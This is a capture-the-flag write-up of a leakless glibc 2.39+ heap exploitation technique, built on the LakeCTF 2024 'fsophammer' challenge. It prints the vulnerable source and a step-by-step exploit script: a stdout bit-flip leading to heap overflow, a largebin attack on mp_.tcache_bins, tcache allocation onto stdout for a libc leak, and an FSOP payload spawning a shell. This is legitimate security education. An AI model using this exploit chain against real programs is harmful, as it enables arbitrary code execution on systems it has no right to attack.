Leakless Code Execution Technique for libc >= 2.39
Last Sunday, I played LakeCTF with CyKor. We ranked 6th in the academic division, succeeded to get to the finals.
I grabbed pwn challenges, which were great and also had many points to learn. Especially for fsophammer, the intended writeup suggests a leakless technique to achieve arbitrary code execution in the latest libc.
This post will describe about the details of the technique.
Requirements
Requirements to use the technique is as follows.
- Heap primitive to allocate and free chunk
- Heap primitive to write at chunk at the time of allocation
Heap vulnerability (BOF, UAF, whatever…) which can be used to overwrite largebin chunk’s bk_nextsize to libc relative value, which will further be used for largebin attack
- This may look tricky at first glance, but simple heap bof can achieve this, by overlapping unsorted bin and largebin chunk. (details below)
Requirements can be less or more according to exact heap primitives or conditions, but these requirements are generally possible, often provided in CTF challs or real world binaries.
Exploit Scenario
Based on these requirements, the exploit scenario of this technique is as follows.
- Prepare two pointers to
_IO_2_1_stdout_
using partial overwrite to chunks allocated from unsorted bin- Note that overwriting
main_arena
value to_IO_2_1_stdout_
may require a 4-bit bruteforce.
- Note that overwriting
- Prepare a largebin chunk, and overwrite it’s bk_nextsize to
&mp_.tcache_bins - 0x20
- Trigger largebin attack, which will overwrite
mp_.tcache_bins
to a heap pointer, which will be greater than the original value (0x40) - Abusing the overwritten
mp_.tcache_bins
, make the allocater use the prepared stdout pointers as tcache entries. Also set thetcache->counts
for the entry index of stdout pointers - Use the first allocaton to stdout, overwrite
flags_
, and_IO_write_base
to get libc leak. - Use the second allocation to achieve code execution using
_wide_data
FSOP.
LakeCTF 2024: fsophammer
Now let’s take a look at the challenge.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
void menu() {
puts("1. alloc\n2. free\n3. slam");
size_t cmd;
if (get_num("cmd",&cmd, 0)) {
return;
}
switch(cmd) {
case 1:
alloc();
break;
case 2:
free_();
break;
case 3:
if (!slammed) {
slam();
slammed = 1;
} else {
puts("[-] slammed already");
}
break;
default:
puts("[-] invalid cmd");
break;
}
}
Three options are given. One alloc, one free, and the slam one.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
void alloc() {
size_t idx;
size_t sz;
if(get_num("index",&idx,N_ENTRIES)) {
return;
}
if(get_num("size",&sz,MAX_SZ)) {
return;
}
entries[idx] = malloc(sz);
get_str(entries[idx],sz);
printf("alloc at index: %zu\n", idx);
}
void free_() {
size_t idx;
if(get_num("index",&idx,N_ENTRIES)) {
return;
}
if(!entries[idx]) {
return;
}
free(entries[idx]);
entries[idx] = NULL;
}
Alloc and free is general, providing write at allocation and freeing without dangling pointer.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
void slam() {
size_t idx;
size_t pos;
puts("is this rowhammer? is this a cosmic ray?");
puts("whatever, that's all you'll get!");
if (get_num("index",&idx,sizeof(*stdin))) {
return;
}
if (idx < 64) {
puts("[-] invalid index");
return;
}
if (get_num("pos",&pos,8)) {
return;
}
unsigned char byte = ((char*)stdin)[idx];
unsigned char mask = ((1<<8)-1) & ~(1<<pos);
byte = (byte & mask) | (~byte & (~mask));
((char*)stdin)[idx] = byte;
}
Slam menu is given to flip one bit from _IO_2_1_stdout_._IO_buf_end
and within _IO_2_1_stdout_
. Given that stdin is buffered and therefore its buffer is allocated on heap, flipping a proper bit of _IO_2_1_stdout_._IO_buf_end
leads to heap bof.
Now let’s follow the exploit scenario above with these primitives.
Exploit
1
2
3
4
5
6
7
# => future unsorted bin chunk
alloc(0,0x450,b"")
alloc(3, 10, b"") # consolidation barrier
# => future largebin chunk
alloc(1,0x500,b"A"*(0x60)+p64(0xc0+0x60)+p64(0x20))
alloc(3, 10, b"") # consolidation barrier
First, we allocate two chunks each for unsorted bin and largebin. Note that a fake chunk header is placed in proper offset of largebin chunk, which will later be used to bypass security check on unsorted bin.
1
2
3
4
alloc(2, 0x4f0, b"") # used later to trigger largebin attack
free(1)
alloc(1, 0x580, b"") # move previous 1 to largebin
free(0) # move 0 to unsorted bin
After, we allocate a chunk which will be used to trigger largebin attack later. Freeing 1 and allocating larger chunk will move 1(previous one) to largebin. And free 0 to put it into unsorted bin.
1
2
3
slam(65, 3)
alloc(3,0x420-0x60,b"") # reduce unsorted bin size
p.sendafter(b"> ", b"A"*(0x1458-0x60)+p16(0x91+0x30+0x60))
Slam _IO_2_1_stdout_._IO_buf_end
to convert scanf to heap overflow primitive. Allocating from unsorted bin before overwriting size will still keep it smaller than the largebin chunk. Overwrite the size to overlap unsorted bin chunk with largebin chunk.
1
2
3
4
5
6
alloc(3,0x20,p64(stdout)[:2]) # tc_idx: 0x2c2
alloc(3,0x20,p64(stdout)[:2]) # tc_idx: 0x2c8
alloc(3,0x50,b"")
alloc(3,0x30,p64(0)+p64(tcache_bins-0x20)[:2])
alloc(3,0x10,b"")
Allocating from unsorted bin returns splitted chunk with main_arena pointer in it. Overwriting 2 bytes of stdout will make a pointer to stdout within heap, with 4-bits of brute force done before. We will prepare 2 pointers to stdout.
Now, we will overwrite largebin chunk’s bk_nextsize by splitting unsorted bin chunk into the largebin chunk. We will also overwrite main arena pointer to point &mp_.tcache_bins - 0x20
. And we will empty unsorted bin to trigger largebin attack in the next stage.
1
2
free(2)
alloc(3,3000,b"") # largebin attack
Freeing previousy allocated 2 will move it to unsorted bin. And freeing larger chunk will move it to largebin, triggering the largebin attack.
1
2
3
4
5
6
7
8
9
10
11
12
size_t tc_idx = csize2tidx (tbytes);
MAYBE_INIT_TCACHE ();
DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
&& tcache
&& tcache->counts[tc_idx] > 0)
{
victim = tcache_get (tc_idx);
return tag_new_usable (victim);
}
Since mp_.tcache_bins
is overwritten to heap address, it is possible to allocate to our modified stdout pointers.
1
2
3
4
5
payload = p64(0xfbad1800)
payload += p64(0)*3
payload += p8(0)
pause()
alloc(3,(0x2c2+1)*0x10, payload)
Distance from tcache->entries
to our stdout pointer(0x2c2) is converted to allocation size(0x2c2+1)*0x10. Also we should set tcache->counts[0x2c2]
, but this was done during the heap overflow payload (b"A"*0x1000+...
).
First allocation to stdout will do the leak.
1
2
3
4
5
6
7
8
9
10
FSOP = FSOP_struct(flags = u64(b"\x01\x01;sh;\x00\x00"), \
lock = struct_ptr + 0x10, \
_IO_read_ptr = 0x0, \
_IO_write_base = 0x0, \
_wide_data = struct_ptr - 0x10, \
_unused2 = p64(libc.symbols['system'])+ b"\x00"*4 + p64(struct_ptr + 196 - 104), \
vtable = libc.symbols['_IO_wfile_jumps'] - 0x20, \
)
alloc(3,(0x2c8+1)*0x10, FSOP)
Second allocation will trigger system("sh")
with the leak.
Conclusion
We got a nice technique to achieve code execution without any leak vulnerability. Big shout out to @skuuk for bringing this great technique and the challenge.
Reference
https://github.com/5kuuk/CTF-writeups/tree/main/tfc-2024/mcguava